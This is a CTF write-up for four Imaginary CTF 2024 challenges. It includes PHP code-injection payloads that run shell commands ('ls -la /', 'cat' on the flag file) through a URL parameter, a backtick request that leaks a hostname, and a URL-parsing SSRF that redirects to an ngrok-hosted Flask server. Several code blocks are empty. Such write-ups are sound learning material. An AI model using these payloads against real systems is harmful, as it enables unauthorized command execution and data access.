Imaginary CTF 2024
Imaginary 2024 writeups
Journal
Simple PHP application.
The following code can be used for code execution '.system('<your command>').'
Since the flag contains randomly generated numbers, we print all the files in the root (we know the flag is there from the Dockerfile) ls -la /
.
This reveals the flag name flag-cARdaInFg6dD10uWQQgm.txt
Request URL: http://journal.chal.imaginaryctf.org/?file='.system('ls -la /').'
Now we can cat
out the flag.
Request URL: http://journal.chal.imaginaryctf.org/?file='.system('cat /flag-cARdaInFg6dD10uWQQgm.txt').'
Flag: ictf{assertion_failed_e3106922feb13b10}
Crystals (ruby sinatra)
This challenge needed to be solved by getting the hostname, this could be seen in the docker-compose.yml
file.
version: '3.3'
services:
deployment:
hostname: $FLAG
build: .
ports:
- 10001:80
The hostname is shown if a request is send with a backtick `
after the default request.
Normal: GET / HTTP/1.1
Shows flag:GET /` HTTP/1.1
The amazing race
The challenge is only available via the URL http://the-amazing-race.chal.imaginaryctf.org/ but the source code is available.
As the name suggest, this is a race condition. This can also be verified in the source code, since there is no locking mechanism.
My solution can probably be solved fully automated (and be a LOT more efficient), but I made a few changes to my script when I was stuck in the maze. This was faster then fully automating it at the time.
|
|
After running it a few times, I was moving.
After doing that a few more times I got the flag! (don’t have the screenshot at hand right now)
Readme2
This challenge took by far most of my time. I tried many things such as bruteforcing all characters to look for anomalies and research online.
Challenge code:
|
|
There are 2 servers, and certain checks need to be passed, but eventually we want to pass the following check: if (url.pathname.startsWith('/flag.txt')) return new Response(flag)
The Mozilla developer docs contains much information about the functionality of the URL
constructor https://developer.mozilla.org/en-US/docs/Web/API/URL/URL
. On the bottom of the page the following section can be found:
The //foo.com
is where our input ends up
|
|
To test if this works I did two tests:
Test 1: normal behaviour
|
|
Output
|
Test 2: vulnerable behaviour
note the two //
instead of one /
at const url =
|
|
Output
|
Flask
Now we know that we can make the fetch
request go to any URL we desire. For this I created a simple python Flask server, which sends a redirects to the server that contains the flag.txt
|
|
I hosted this Flask server via NGROK ngrok tcp 127.0.0.1:5000
. This is needed so the online challenge website can reach it.
And the final request shows the flag http://readme2.chal.imaginaryctf.org///6.tcp.eu.ngrok.io:14537
Flag: ictf{just_a_funny_bug_in_bun_http_handling}